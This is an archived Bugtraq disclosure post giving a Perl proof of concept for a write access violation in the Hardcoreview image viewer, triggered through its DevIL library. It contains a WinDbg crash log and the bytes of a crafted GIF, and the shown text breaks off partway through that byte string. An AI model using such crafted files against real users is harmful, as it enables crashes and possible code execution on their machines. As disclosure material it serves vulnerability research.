Home page logo
/

bugtraq logo Bugtraq mailing list archives

Hardcoreview WriteAV Arbitrary Code Execution
From: pereira () secbiz de
Date: Fri, 5 Oct 2012 09:20:36 GMT

#!/usr/bin/perl
 
# Hardcoreview WriteAV Arbitrary Code Execution
 
# Author: Jean Pascal Pereira <pereira () secbiz de>
 
# Vendor URI: http://sourceforge.net/projects/hardcoreview/
 
# Vendor Description:
# Image browser. Designed and created for profesional and amature watching image files.
# All kind of image files ;) . Support *.jpg, *.gif, *.bmp, *.psd, and many more.
 
# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\hardcoreview\hardcoreview.exe" C:\research\hcview\crafted.gif
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path.           *
# * Use .symfix to have the debugger choose a symbol path.                   *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is: 
# ModLoad: 00400000 00443000   hardcoreview.exe
# ModLoad: 7c900000 7c9b2000   ntdll.dll
# ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
# ModLoad: 5ed00000 5edcc000   C:\WINDOWS\system32\OPENGL32.dll
# ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
# ModLoad: 77e70000 77f03000   C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
# ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
# ModLoad: 68b20000 68b40000   C:\WINDOWS\system32\GLU32.dll
# ModLoad: 73760000 737ab000   C:\WINDOWS\system32\DDRAW.dll
# ModLoad: 73bc0000 73bc6000   C:\WINDOWS\system32\DCIMAN32.dll
# ModLoad: 10000000 102be000   C:\Program Files\hardcoreview\DevIL.dll
# ModLoad: 7c420000 7c4a7000   
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCP80.dll
# ModLoad: 78130000 781cb000   
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll
# ModLoad: 00350000 00365000   C:\Program Files\hardcoreview\ILU.dll
# ModLoad: 00380000 0038f000   C:\Program Files\hardcoreview\ILUT.dll
# ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 5d090000 5d12a000   C:\WINDOWS\system32\COMCTL32.dll
# ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 003a0000 003b5000   C:\Program Files\hardcoreview\pthreadVC2.dll
# ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.dll
# ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
# ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 78480000 7850e000   
C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCP90.dll
# ModLoad: 78520000 785c3000   
C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCR90.dll
# (e4c.8c8): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 773d0000 774d3000   
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\version.dll
# ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
# ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 61dd0000 61dd6000   C:\WINDOWS\system32\MCD32.DLL
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
# (e4c.8c8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0151adc0 ebx=01510178 ecx=0151edf0 edx=d9f3d1b1 esi=0151adb8 edi=01510000
# eip=7c9108f3 esp=0012fb00 ebp=0012fbbc iopl=0         nv up ei ng nz ac pe cy
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
# ntdll!wcsncpy+0x374:
# 7c9108f3 8902            mov     dword ptr [edx],eax  ds:0023:d9f3d1b1=????????
# 0:000> g;r;!exploitable -v;q
# (e4c.8c8): Access violation - code c0000005 (!!! second chance !!!)
# eax=0151adc0 ebx=01510178 ecx=0151edf0 edx=d9f3d1b1 esi=0151adb8 edi=01510000
# eip=7c9108f3 esp=0012fb00 ebp=0012fbbc iopl=0         nv up ei ng nz ac pe cy
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000297
# ntdll!wcsncpy+0x374:
# 7c9108f3 8902            mov     dword ptr [edx],eax  ds:0023:d9f3d1b1=????????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll - 
# *** WARNING: Unable to verify checksum for C:\Program Files\hardcoreview\DevIL.dll
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\hardcoreview\DevIL.dll - 
# *** ERROR: Module load completed but symbols could not be loaded for hardcoreview.exe
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - 
# Exception Faulting Address: 0xffffffffd9f3d1b1
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation

# Exception Hash (Major/Minor): 0x69293f33.0x12365f02

# Stack Trace:
# ntdll!wcsncpy+0x374
# MSVCR80!free+0xcd
# DevIL!icalloc+0x49
# DevIL!ilDxtcDataToImage+0x2e7f
# DevIL!ilDxtcDataToImage+0x308c
# DevIL!ilDxtcDataToImage+0x30e4
# hardcoreview+0x41ba
# kernel32!RegisterWaitForInputIdle+0x49
# Instruction Address: 0x000000007c9108f3

# Proof of Concept:
 
my $crafted =

"\x47\x49\x46\x38\x39\x61\x32\x00\x32\x00\xF7\x00\x00\x00\x00\x00".
"\xFF\xFF\xFF\xE0\x29\x3F\x6F\x2D\x30\xB9\x78\x7A\xD9\x45\x4C\xA4".
"\x82\x84\xE6\x26\x35\xE8\x27\x39\xE6\x29\x3A\xD3\x2C\x3B\xDD\x30".
"\x40\xDE\x34\x43\x6A\x1C\x23\x5B\x19\x1F\xE6\x27\x3B\xE6\x29\x3D".
"\xE2\x28\x3D\xE8\x2A\x3E\xE6\x2A\x40\xE1\x29\x3D\xE0\x29\x3B\xEE".
"\x2C\x40\xE4\x2A\x3F\xE2\x2A\x3F\xDF\x29\x3D\xEA\x2C\x42\xE0\x2A".
"\x3F\xE0\x2A\x3D\xDF\x2A\x3D\xDF\x2A\x3F\xDE\x2A\x3B\xD9\x29\x3A".
"\xE5\x2C\x41\xE4\x2D\x3F\xDC\x2B\x3F\xDB\x2C\x3E\xE2\x2E\x42\xDD".
"\x2D\x3E\x7A\x1C\x27\x2D\x0F\x12\x2A\x16\x18\xE1\x21\x3B\xE3\x23".
"\x3D\xE3\x25\x3D\xE6\x26\x3E\xE5\x26\x40\xDE\x25\x3B\xE3\x27\x3F".
"\xED\x29\x42\xE2\x27\x3D\xE1\x27\x3D\xED\x2A\x45\xE2\x28\x3E\xE1".
"\x28\x3F\xD7\x26\x3B\xE9\x2A\x41\xE2\x29\x40\xE1\x29\x3F\xE0\x29".
"\x40\xE8\x2B\x44\xDF\x29\x40\xDF\x29\x3F\xDD\x29\x40\xD4\x27\x3F".
"\xE3\x2B\x43\xE0\x2A\x40\xDA\x29\x3F\xE9\x2D\x47\xE3\x2C\x45\xE6".
"\x2D\x45\xDF\x2C\x44\xDB\x2B\x40\xC9\x28\x3C\xE4\x2F\x48\xDC\x2D".
"\x44\xD2\x2C\x43\xC6\x2B\x3F\xAA\x27\x39\x2C\x0A\x0E\x8F\x21\x2E".
"\x91\x2B\x38\x4A\x1B\x21\xE9\x26\x42\xE1\x27\x42\xEC\x2A\x47\xDF".
"\x28\x42\xDC\x2F\x49\xD0\x30\x49\xD0\x31\x4A\xED\xA9\xB3\xCC\x31".
"\x4D\xC8\x34\x4F\xC7\x34\x4F\x8D\x71\x76\xC9\x32\x4F\xCF\x35\x53".
"\xC7\x34\x51\xC2\x37\x53\x3B\x19\x20\xBB\x3A\x57\x2B\x20\x23\xAF".
"\x40\x60\x14\x0E\x10\xC6\x95\xA6\x24\x1C\x1F\x22\x14\x1A\x18\x11".
"\x14\x88\x41\x63\xBF\x96\xAC\x1F\x1A\x1D\x0D\x04\x0C\x1A\x16\x1A".
"\x17\x15\x18\x8B\x81\x90\x25\x23\x27\x1B\x19\x22\x0F\x0E\x17\x7F".
"\x7C\x9B\x88\x8E\xBE\x73\x82\xBD\x4C\x55\x79\x91\xA6\xF3\x84\x95".
"\xCB\x63\x74\x9F\xD1\xDB\xF4\xBB\xC0\xCC\x53\x64\x8B\x8D\xA9\xE9".
"\x37\x4A\x71\x8D\xAE\xF4\x86\xA3\xDE\xD6\xE3\xFE\x93\xB6\xF6\x8B".
"\xB3\xF5\x8B\xAF\xEC\x23\x31\x46\x11\x1C\x1E\x0F\x12\x12\x09\x14".
"\x0E\x0D\x0B\x06\x07\x06\x04\x17\x12\x0C\xD2\xAC\x87\x0D\x0C\x0B".
"\x15\x14\x13\xBE\x92\x6D\xD0\xA4\x83\xD0\xA0\x7E\x27\x1E\x18\xCA".
"\x9D\x7F\x89\x5D\x40\x95\x67\x4B\xAC\x7B\x5B\xA1\x72\x55\xB7\x86".
"\x68\xC4\x93\x74\xD1\xA5\x89\x41\x2D\x21\x8C\x64\x4E\xCE\x97\x79".
"\xBC\x8C\x71\xDB\xA4\x85\xE0\xA9\x8B\xC3\x95\x7B\xB1\x89\x72\xD2".
"\xA3\x88\xDA\xAB\x8F\xCE\xA0\x87\xBB\x92\x7A\x1A\x15\x12\x1E\x16".
"\x12\xD1\x9A\x7F\x9A\x74\x61\xD8\xA4\x8A\xC7\x98\x7F\x53\x3F\x35".
"\xD8\xA6\x8D\x9B\x7F\x71\xC1\xA3\x94\x4E\x33\x26\x6D\x49\x39\x7C".
"\x53\x41\xCC\x94\x7B\xC3\x8E\x76\xD4\x9E\x85\xE3\xAD\x94\xCC\x9B".
"\x85\xC2\x99\x85\xCA\xA0\x8D\xD5\xA9\x95\xC3\x9E\x8D\xB5\x94\x85".
"\xEB\xD8\xCF\x24\x15\x0F\xC1\x86\x6E\xB4\x7D\x67\xCD\x90\x77\xA6".
"\x76\x63\xD8\x9C\x83\xDC\xA2\x8A\xD7\xA0\x88\xAA\x7E\x6B\xD5\xA2".
"\x8E\xD3\xA1\x8D\xDA\xA9\x94\xE3\xB1\x9C\xDE\xAC\x98\xBE\x93\x82".
"\xE6\xB6\xA3\xBF\x98\x88\xCE\x95\x81\xC6\x94\x81\xDB\xA5\x91\xD4".
"\xA5\x94\xB1\x8B\x7D\xA9\x85\x77\xE0\xB7\xA7\x60\x40\x36\xBB\x83".
"\x70\xD4\x9D\x8A\xB2\x83\x74\x90\x6B\x5F\xB9\x8B\x7C\x6D\x53\x4A".
"\x35\x21\x1B\xC3\x9E\x94\x7F\x61\x59\xA3\x80\x77\xD2\xA9\x9F\xCA".
"\xA3\x99\x23\x15\x12\x1E\x19\x18\xDE\xCA\xC6\x30\x15\x10\x16\x0A".
"\x08\xDC\x8E\x80\x39\x27\x24\xD2\x79\x6B\xDC\x85\x77\x19\x12\x11".
"\xD3\xA0\x98\x2F\x1D\x1B\xED\xBC\xB6\xAB\x4F\x47\x24\x18\x17\xBB".
"\x95\x92\xAD\x6E\x6A\xD9\x5C\x5C\xB7\x6A\x69\x1E\x16\x16\x19\x15".
"\x15\x2E\x28\x28\x08\x07\x07\xA8\xA5\xA5\xFF\xFF\xFF\x21\xF9\x04".
"\x01\x00\x00\xFF\x00\x2C\x00\x4B\x00\x00\x32\x00\x32\x00\x00\x08".
"\xFF\x00\x03\x08\x1C\x48\xB0\xA0\xC1\x83\x08\x13\x2A\x5C\xC8\xB0".
"\x21\x43\x32\x5F\xB8\x48\x9C\x38\xF1\xCB\x97\x2E\x5F\xB6\x5C\x0C".
"\xC3\x65\x8B\x46\x8B\x5D\x30\x5A\x1C\x79\xB1\x0B\x45\x89\x5B\xCC".
"\x18\x64\x22\xA0\xA5\xCB\x97\x02\x32\x64\x40\x82\x84\x4A\x8E\x0A".
"\x0F\x20\x98\x88\x00\xA1\xC3\x87\x08\x35\x90\x8C\xF0\x30\xD4\x86".
"\x0D\x1D\x30\x5B\x86\x31\x88\x25\xE9\x4B\x0F\x1E\x5C\xB4\xB0\xD1".
"\xC3\x46\x08\x1E\x41\x96\x14\x31\x42\x84\xC6\x04\x0A\x32\x6A\xF8".
"\xF0\x31\x62\x04\x0C\xA4\x49\xC5\x30\x75\xDA\x52\x47\x8F\x1F\x3A".
"\x28\x54\x90\x40\xC4\x49\x03\x07\x78\x1B\x9C\x70\xC2\x84\xC8\x04".
"\x19\x30\x5C\x10\x15\x80\x16\xA6\xDA\x82\x4D\xD9\xFA\x80\x61\x63".
"\x04\x8F\x2A\x4D\x4E\x3C\x61\x04\x69\x1D\x24\x46\xEB\xD6\xA9\x6B".
"\xD0\x44\x49\x88\x16\x35\x46\xD8\xA8\xE1\xF4\x30\xC1\xC4\x30\x75".
"\x78\x88\x09\xA1\xAE\x03\x14\xEB\x1C\xC5\x39\xB3\x46\x55\xA4\x35".
"\x91\x16\x31\x42\x71\x82\x49\x15\x18\x19\x60\x90\x4E\xBB\xD6\x65".
"\x0D\x0A\x3F\x6A\x74\xE8\x30\xC5\xC8\x09\x47\x67\xCE\x38\x82\x87".
"\x1B\x9E\xA3\x48\x71\xE2\xA8\x82\xA7\x08\xD2\x18\x27\x26\x12\xF4".
"\xFF\xE8\x51\xDA\x60\x96\x97\x14\x32\xEC\xD0\x21\x03\xC7\x95\x06".
"\x8C\x1A\xAD\x93\xE7\x49\x9E\x3E\x7D\xB6\x23\x4D\x57\xC5\x3F\xB7".
"\x23\x28\x55\x50\x40\x42\x79\x05\x9D\xE7\x92\x07\x1D\xC0\x20\x00".
"\x0C\x55\x34\x00\xC9\x1B\xEB\xD0\x52\x4B\x2D\x9E\x08\xB3\xCA\x2A".
"\xF0\xC0\xA3\xCA\x3E\x91\xC0\x73\x1F\x3A\xF7\x39\x61\xC1\x07\x04".
"\x12\x64\xA0\x4B\x3E\x78\x10\x01\x11\x50\xAC\xD3\xCF\x3A\xB6\x60".
"\x72\xC9\x25\xDA\x78\x62\x63\x38\xF5\xEC\x93\x1D\x3C\xE7\x54\xB2".
"\x8A\x1A\x89\x84\xD3\x84\x04\x25\x0E\x74\xA2\x00\x36\x08\x30\xC2".
"\x04\x4D\x08\x53\x59\x2D\x99\x64\xA2\x89\x26\x98\xD8\x52\x8B\x95".
"\xB4\xE0\xB8\x8F\x3E\xAB\xB4\xD3\xCE\x2A\x71\xB8\x31\x40\x10\x17".
"\x10\x57\xE0\x53\x61\x39\xC7\xC8\x1B\xB4\x44\x99\x09\x31\x6E\xCE".
"\xA8\xC9\x27\x14\xD6\x83\x4E\x19\xE1\xD4\x08\x0F\x1D\xFC\x38\xA1".
"\x81\x07\x49\xDA\xB0\x9A\x69\x46\xC2\x44\x81\x08\x49\xA8\x03\x89".
"\x30\x9F\x6C\xB2\xC9\x30\x8E\x46\xAA\x89\xA3\x99\x5C\x42\x4B\x3D".
"\x5E\x6A\xF3\x49\x38\x6E\xCC\x31\x40\x09\x1F\x50\xC1\x41\x0D\x83".
"\x9A\x07\x13\x06\x46\xB4\x08\x49\x3B\xCA\x84\xE2\x2A\x27\x9C\x0C".
"\xFF\x23\x09\x2E\xA1\xE0\x72\x0B\x29\xA1\x7C\x42\x0B\x3F\xB0\xD0".
"\xD2\x4A\x2D\x70\xCC\xD1\x4E\x12\x13\x58\xD1\x41\x0D\x3B\x08\x40".
"\xA8\x40\x47\xDA\x20\xC4\x11\x0E\x28\x72\x06\x2D\xDD\xE0\x82\x0B".
"\x29\x9C\x14\xA3\xED\x2D\xAC\xB0\x02\x0A\x28\xD6\x62\xE2\x09\x2C".
"\xDA\xD8\x02\x4E\x24\x73\xCC\x11\x05\x0D\x54\xA4\x47\xDE\xB2\x01".
"\x1C\xA9\x03\x06\x40\x84\x03\xC7\xB4\xA5\xA4\xF2\x0A\x35\xDC\xDE".
"\x72\xCB\x34\xB9\xE4\xC2\xCA\xBE\xB7\xE0\xF2\x09\x2C\x9F\xD8\x02".
"\x8B\x23\x9D\x0E\xC0\xC3\x14\x15\xA4\xA8\xAC\xA9\x2F\x5D\xC0\x44".
"\x3B\x74\x44\x02\x4B\x2A\xA9\x28\x83\x8D\x34\xD6\x54\xB3\x4C\x32".
"\xDC\x30\xB3\x0C\x37\xC9\x30\xD3\x0B\x34\xDE\x68\x92\x89\x36\xF0".
"\x34\x1C\x83\x10\x1F\xB8\x90\x2C\xBC\x47\x66\x00\x41\x12\xED\xA4".
"\x01\x0F\x38\xD3\xB4\x02\x0E\x38\xE3\xC8\xC2\xCB\x32\xCF\x3C\xD3".
"\x4C\x33\xCF\x58\x03\x8C\x2C\xB2\x78\x63\x8C\x24\xB6\xC0\x91\x86".
"\xBA\x31\x90\x40\x82\x0B\x0A\xE2\xFC\xD2\x0E\x13\x28\x30\x46\x1A".
"\x8E\xD8\x82\x4B\x2B\xE4\x78\x31\xCE\x38\xAD\xA4\xC2\x4D\x35\xD5".
"\xC4\xB2\x8B\x2C\xE3\x0C\xCD\x36\xD5\xAA\xA4\xE1\x46\x14\x25\x3C".
"\xFF\x30\x02\x92\x13\x9F\xE9\x92\x0D\x13\x30\x31\x06\x1D\xF0\x8C".
"\xC3\x8B\x34\xE6\xF4\xE2\x38\x34\xAF\xB0\x72\x4C\x32\xB9\x50\x93".
"\x2F\x35\xD0\x5C\x93\x0A\x27\xB6\xC4\x8C\x4E\x14\x46\xB4\x30\x42".
"\x07\x2D\x79\x6D\x1C\x04\x4D\x8C\x71\x5F\x2D\xDB\x7C\x73\x0D\x39".
"\xE3\x78\xF3\xCD\x37\xD0\xA0\x22\xB2\x24\xDF\x60\x23\xCB\x35\xC0".
"\xA4\x62\x89\x2D\x6B\xAC\xB1\x0F\xE8\x36\x73\x50\x3A\xC5\x2D\xD5".
"\xB0\xF3\x00\xE0\x9C\x63\xCB\x27\xDE\x18\xE0\x0D\x38\xDA\x90\x63".
"\x0F\x30\xAD\x74\x83\x0D\x39\xDD\xD4\x02\x8B\x17\x6D\x5C\xE3\x8D".
"\x36\x95\xA8\xB3\x8A\x13\x25\xCC\x60\x43\x04\x14\x04\x6E\x22\x4C".
"\x39\x80\x40\x8F\x31\x29\xB4\xE2\x8B\x39\xE6\x88\x23\xCD\x37\xDD".
"\x5C\x83\x0D\x26\x92\x88\x9E\x31\xD0\x66\x0F\x34\x48\x23\x15\x07".
"\xC3\x04\x2D\x92\x50\x01\x01\x58\xE1\x38\xEE\x2B\xD4\x4B\x7A\x50".
"\x01\x7A\x0C\x43\x1B\xC6\x70\x45\x3C\xCA\xE1\x8C\x66\xEC\xE2\x16".
"\xDF\x68\x45\x28\x46\xA1\x0C\x65\x94\x82\x1A\xB1\x70\x45\x33\xAA".
"\x71\x8A\x97\x19\x83\x1E\x37\x80\x40\x0D\x7A\x40\xBA\x08\x32\xEB".
"\x25\x46\xA1\x40\x01\x8A\x51\x0B\x65\xB8\xC2\x17\xD9\xC8\x86\x35".
"\xFF\x76\x81\x0A\x54\xBC\x22\x16\xBA\xA0\x04\x35\x48\x91\x8A\x5D".
"\xC4\xC2\x19\xB1\x10\x05\x31\x6A\xA1\x89\x02\x0C\xC1\x06\x67\x19".
"\x8B\x0D\xE3\x85\xC3\x1C\xCC\x80\x01\xEE\xB0\x05\x31\x62\x11\x8D".
"\x79\x64\xA3\x19\xB1\x48\xDA\x32\x9A\xA1\x0B\x64\x98\x62\x19\xBB".
"\x60\xC6\x33\xA2\xA1\x0B\x51\x18\xC3\x16\xEE\x30\x01\x16\x73\xB0".
"\xA0\x24\x99\xCE\x25\x23\x68\xC1\x0B\xF0\x41\x8A\x61\x2C\xC3\x19".
"\x41\x74\x86\x2E\xAA\xC1\x0D\x6E\xB0\x11\x19\xAC\x70\xE4\x1C\xA3".
"\x31\x0A\x29\x0E\x03\x1F\x2A\x70\x01\x06\xA0\xC2\x98\x2D\x1E\x89".
"\x28\x30\x78\x41\x01\x90\x71\x8B\x5D\x4C\xD2\x19\xC9\xD8\x06\x37".
"\x9C\x11\x8D\x56\x22\x63\x1B\xD3\x78\x86\x33\x9C\x31\x0A\x50\x14".
"\xE3\x1D\x26\x50\x41\x92\xCA\x72\x14\x4F\xBE\x24\x03\x11\xD8\xC1".
"\x0F\x66\xF0\x8E\x5D\xB0\x82\x69\x8A\x2C\x06\x2C\x09\xB0\x0B\x6E".
"\xE0\x62\x1A\xD3\xD8\x46\x35\x74\x31\x0A\x57\x80\x82\x12\xF8\x78".
"\x81\x07\x74\xD0\xC9\x1A\x20\xE5\x8F\x48\x52\xD0\x0E\x06\xC9\x0E".
"\x56\x24\x03\x19\xA7\x38\x86\xC9\xBA\x61\x0C\xDA\x29\xE3\x1B\xCD".
"\x00\x98\x28\x8E\x91\x0B\x50\x88\x02\x93\x1B\x10\x40\x0D\x6A\x60".
"\xFF\x94\xE3\x09\xAE\x2D\x8D\xD1\x41\x0D\x6E\x80\x8F\x5D\xE4\xE2".
"\x18\xA6\xD8\x45\xFE\xEC\x21\x0E\xFC\xE9\xEF\x17\xBB\x20\x85\xB7".
"\x28\x51\x0C\x7C\x84\xC0\x07\x6C\x01\x67\x4B\xFE\xE6\x02\x15\x14".
"\x80\x15\x93\x98\x04\x2A\xA4\xF1\x8B\x59\x94\x23\x1E\x28\x2D\x87".
"\x39\x7E\xC1\x0B\x89\x52\x62\x12\xEF\xF8\xC0\x0B\x46\xC0\x47\x33".
"\xBD\x6F\x70\x30\x20\x4B\x0E\x56\xC0\x80\x62\x84\x74\x17\x99\xEB".
"\x86\x32\xF2\x41\xD4\x7B\x10\xA0\x1B\xA5\x80\xC6\x24\x8E\x31\x09".
